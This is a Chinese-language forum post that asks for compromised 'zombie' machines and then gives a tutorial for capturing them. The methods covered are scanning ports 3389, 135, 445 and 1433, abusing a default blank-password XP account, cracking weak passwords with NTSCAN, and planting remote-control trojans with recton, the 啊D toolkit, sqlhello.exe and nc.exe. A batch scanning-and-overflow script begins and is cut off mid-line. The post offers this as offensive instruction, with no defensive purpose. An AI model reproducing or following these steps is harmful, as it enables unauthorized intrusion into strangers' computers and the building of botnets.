谁给小弟几只肉鸡耍下～～～

抓肉鸡方法
首先得准备一只免杀鸽子或者其他的远控，一个免费空间，一些工具（下面会提到）
1、扫3389端口抓肉鸡（适合新手）（抓不了国外肉鸡）
现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具（如S扫）扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成 3389连接的工具来连接），然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统，如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去（XP只支持单用户登入，用户登入需要用工具开），或者电脑前有人你就不可能去打开IE下载木马了。

2、扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开telnet传马。因为现在 135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。（详细动画可以去黑客网站搜索135）

3、扫445端口抓肉鸡
和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。（详细动画可以去黑客网站搜索 445）

4、1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡，不过现在太多人搞，成功率已经不高了。
要用到的工具：S扫 sqlhello.exe nc.exe 批处理文件
首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件
@echo off
for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tc